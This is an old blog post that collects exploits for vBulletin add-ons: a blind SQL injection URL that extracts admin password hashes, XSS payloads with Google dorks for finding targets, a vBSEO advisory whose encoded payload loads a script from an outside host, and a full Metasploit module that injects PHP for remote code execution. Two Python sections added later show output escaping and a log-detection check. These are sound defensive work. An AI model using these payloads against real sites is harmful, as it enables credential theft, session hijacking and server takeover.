Wednesday, 15 May 2013

Vbulletin MOD all


c0d3_z3r0/vBulletin vbBux/vbPlaza Blind SQL Injection 


--==+======================================================================================================================+==--
--==+                  vBulletin vbBux/vbPlaza <= 2.x (vbplaza.php) Remote Blind SQL Injection Vulnerability                +==--
--==+======================================================================================================================+==--
AUTHOR: Cold z3ro & Crck_Man
SITE: www.vbPlaza.com
DORK: inurl:"vbplaza.php?do=*"
DESCRIPTION: Blind SQL Injection in name of vbplaza.php a mod for vBulletin, able to retrieve admin hash
EXPLOIT:
http://www.site.com/forum/vbplaza.php?do=item&name=bank'/**/and 58<ascii(substring((SELECT concat(password,0x3a,username) from user limit 0,1),33,1))/*
IE: ascii encodes
  58  => :
  48  => 0
  120 => x
NOTE: You'll need to be logged into the forum to exploit vbplaza.php. Increment the limit to get the next admin.
Copyrights : www.hackteach.org , www.h-t.cc
Greetz : www.hackteach.[org/net] , www.islam-attack.com , www.s3curi7y.com , www.xp10.biz , Friends





vBTube
title    : vBTube v1.1 - Beta ( Vbulletin Tube) Xss Vulnerable
Author   : Crackers_Child [ cybermilitan@hotmail.com ]
Exploit  : vBTube.php?do=search&search=<script>alert(document.cookie)</script>
Dork     : inurl:vBTube.php   ( about 120,000 results for inurl:vBTube.php )
Greetz   : www.biyofrm.com & www.sibersavascilar.com

vBShout
# Exploit Title: vBShout persistent XSS 0day
# Google Dork: "DragonByte Technologies Ltd" vbshout
# Date: 21/3/2012 9:00 PM #EST
# Author: ToiL
# Software Link: http://www.dragonbyte-tech.com/
# Version: all
# Tested on: all
# CVE : XSS
#Greeting from Team Odyessy.
#Today we will release a 0day for the vBulletin mod, vBShout.
#This 0day exploit is brought to you by www.Bugabuse.net/
#Have fun, And happy exploiting.
######Guide########
Enter
<script>top.location='https://www.bugabuse.net/';</script>
into the shoutbox
go into the archive.
Voila. Persistent XSS exploit.
Modify to your liking.


vBshop persistent XSS
# Exploit Title: vBshop persistent XSS 0day
# Google Dork: "DragonByte Technologies Ltd" vbshout
# Date: 25/3/2012 9:32 PM #EST
# Author: ToiL
# Software Link: http://www.dragonbyte-tech.com/
# Version: all
# Tested on: all
# CVE : XSS
#Greeting from Team Odyessy.
#Today we will release a 0day for the vBulletin mod, vBShout.
#This 0day exploit is brought to you by www.Bugabuse.net/
#Have fun, And happy exploiting.
######Guide########

Go to vBshop
Gift an item to another user.
In the 'message to user' put:
<script>top.location='https://www.bugabuse.net/';</script>
Send the item off.
Go to the user's profile that you gifted
Boom. Pers. XSS.
Edit to your liking.


vBSEO - Persistent XSS ( 3.5.2 & 3.2.2)
http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/
Versions Affected: 3.5.2 & 3.2.2 (Most likely all versions)
Info: A proven success record, vBSEO powers the most optimized forums on the Web. The #1 SEO plugin and the only professional, fully supported solution. A full package of SEO enhancements, one install, one upgrade.
External Links: http://www.vbseo.com
Credits: MaXe (@InterN0T)

-:: The Advisory ::-
vBSEO is prone to persistent XSS due to insufficient sanitization of the titles on external websites vBSEO reads.
ModCP & AdminCP have the following features affected: "Moderate LinkBacks", "Incoming LinkBacks", "Outgoing LinkBacks"
Sample PoC:<html><head><title> [XSS String] </title></head><body><a href="hxxp://vbulletin-installation-with-vbseo.tld/01-some-forum-thread.html">SEKSCY INJECT TIEM!</a>
</body></html>
After clicking the link, which the attacker has to do, vBSEO will initiate a GET request to the target and will then save the linkback if enabled, in either the incoming linkback list or the moderation queue. By default all linkbacks are enabled and this linkback is known as the "RefBack". (vBSEO checks the Referrer.)
Sample XSS String:test"><script>document.write(atob(/PHNjcmlwdCBzcmM9Imh0dHA6Ly9pbnRlcm4wdC5uZXQvdXR1YmUvaW5kZXgucGhwP3hzcz1oYXgwcjF0bjB3ZjByMzQxIj48L3NjcmlwdD4=/.source));</script>

-:: Solution ::-
The vendor is still working on a patch even though it is very simple to patch.
File: /modcp/vbseo_moderate.php
Lines: 276 or 274 (depends on version), 230, 178, 112 are vulnerable.
Details: Look for "$pback[t_title]" which is the major cause of this vulnerability.

Disclosure Information:
- Vulnerability found and researched: 16th December 2010
- Disclosed to vendor (vBSEO): 16th December
- Semi-Disclosed at InterN0T: 30th December
- Detailed Disclosure: 31st January 2011

References:
http://forum.intern0t.net/intern0t-advisories/3559-vbseo-3-5-2-3-2-2-persistent-cross-site-scripting-via-linkbacks.html 
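
The fix the advisory points at is to encode the stored linkback title at the place it is written into the moderation page. The following is an added example in Python rather than vBSEO's PHP, and it is not the vendor's patch; the row layout, function names, hostnames and sample page are constructed assumptions.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed referring page, shaped like the advisory's sample PoC.
REFERRING_PAGE = (
    '<html><head><title> test"><script>alert(1)</script> </title></head>'
    '<body><a href="http://forum.example/01-some-forum-thread.html">link</a>'
    '</body></html>'
)

TITLE_RE = re.compile(r"<title[^>]*>(.*?)</title>", re.I | re.S)


def extract_title(page, max_len=200):
    """Return the raw, untrusted <title> text, whitespace-collapsed and capped."""
    match = TITLE_RE.search(page)
    raw = match.group(1) if match else ""
    return " ".join(raw.split())[:max_len]


def render_row_unsafe(ref_url, title):
    # The flaw described above: the stored title is echoed into markup as-is.
    return '<tr><td><a href="%s" title="%s">%s</a></td></tr>' % (
        ref_url, title, title)


def render_row_safe(ref_url, title):
    # Encode at output time. quote=True also encodes " and ', which the
    # sample string's leading test"> needs in order to leave an attribute.
    # The referrer URL is attacker-chosen too: allow only http(s) links.
    scheme = urlsplit(ref_url).scheme.lower()
    href = ref_url if scheme in ("http", "https") else "#"
    return '<tr><td><a href="%s" title="%s">%s</a></td></tr>' % (
        html.escape(href, quote=True),
        html.escape(title, quote=True),
        html.escape(title, quote=True),
    )


if __name__ == "__main__":
    stored = extract_title(REFERRING_PAGE)
    print(render_row_unsafe("http://attacker.example/page.html", stored))
    print(render_row_safe("http://attacker.example/page.html", stored))
```

Encoding belongs at every place the title is printed (the advisory lists four lines in /modcp/vbseo_moderate.php), not only where it is stored.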


EgiX/vBSEO 3.6.0 proc_deutf() Remote PHP Code Injection


http://www.exploitsdownload.com/exploit/na/vbseo-360-proc_deutf-remote-php-code-injection

require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection',
'Description' => %q{
This module exploits a vulnerability in the 'proc_deutf()' function
defined in /includes/functions_vbseocp_abstract.php. User input passed through
'char_repl' POST parameter isn't properly sanitized before being used in a call
to preg_replace() function which uses the 'e' modifier. This can be exploited to
inject and execute arbitrary code leveraging the PHP's complex curly syntax.
},
'Author' => 'EgiX <n0b0d13s[at]gmail.com>', # originally reported by the vendor
'License' => MSF_LICENSE,
'Version' => '$Revision,
'References' =>
[
['BID', '51647'],
['URL', 'http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 8190,
'Keys' => ['php'],
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Jan 23 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "The full URI path to vBulletin", "/vb/"]),
], self.class)
end
def check
flag = rand_text_alpha(rand(10)+10)
data = "char_repl='{${print(#{flag})}}'=>"
uri = ''
uri << datastore['URI']
uri << '/' if uri[-1,1] != '/'
uri << 'vbseocp.php'
response = send_request_cgi({
'method' => "POST",
'uri' => uri,
'data' => "#{data}"
})
if response.code == 200 and response.body =~ /#{flag}/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
if datastore['CMD']
p = "passthru(\"%s\");" % datastore['CMD']
p = Rex::Text.encode_base64(p)
else
p = Rex::Text.encode_base64(payload.encoded)
end
data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"
uri = ''
uri << datastore['URI']
uri << '/' if uri[-1,1] != '/'
uri << 'vbseocp.php'
response = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'data' => data,
'headers' => { 'Code' => p }
})
print_status("%s" % response.body) if datastore['CMD']
end
end
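
The request patterns described in the advisories on this page (a quote and SQL keywords in the `name` parameter of vbplaza.php, markup in the `search` parameter of vBTube.php, PHP curly syntax in the `char_repl` POST field of vbseocp.php) can be turned into a log check. This is an added example, not code from the post or the module's author; the record layout, rule labels and sample requests are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# (script, parameter, pattern, label) taken from the advisories above;
# the labels are names made up for this example.
RULES = [
    ("vbplaza.php", "name",
     re.compile(r"['\"]|/\*|\b(select|union|substring|ascii)\b", re.I),
     "sqli-vbplaza-name"),
    ("vbtube.php", "search",
     re.compile(r"<\s*/?\s*[a-z!]", re.I), "xss-vbtube-search"),
    ("vbseocp.php", "char_repl",
     re.compile(r"\{\s*\$|\$\s*\{"), "phpinj-vbseo-char_repl"),
]

# Constructed records (method, request target, body), as a reverse proxy
# or WAF audit log that captures POST bodies might provide them.
SAMPLE_REQUESTS = [
    ("GET", "/forum/vbplaza.php?do=item&name=bank", ""),
    ("GET", "/forum/vbplaza.php?do=item&name=bank'/**/and 58<ascii(substring((SELECT 1),1,1))/*", ""),
    ("GET", "/forum/vBTube.php?do=search&search=<script>alert(1)</script>", ""),
    ("GET", "/forum/vBTube.php?do=search&search=cats", ""),
    ("POST", "/vb/vbseocp.php", "char_repl=%27%7B%24%7Bprint(1)%7D%7D%27%3D%3E"),
    ("POST", "/vb/vbseocp.php", "char_repl='a'=>'b'"),
]


def classify(method, target, body=""):
    """Return the labels of every rule the request matches."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    # parse_qs percent-decodes, so encoded values are matched decoded.
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST":
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return [label for rule_script, param, pattern, label in RULES
            if script == rule_script
            and any(pattern.search(v) for v in params.get(param, []))]


def scan(requests):
    """Return (index, labels) for each record that matched a rule."""
    findings = []
    for index, (method, target, body) in enumerate(requests):
        labels = classify(method, target, body)
        if labels:
            findings.append((index, labels))
    return findings
```

Plain access logs usually omit POST bodies, so the `char_repl` rule needs a source that records them; without one, any unauthenticated POST to vbseocp.php is worth reviewing by hand.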
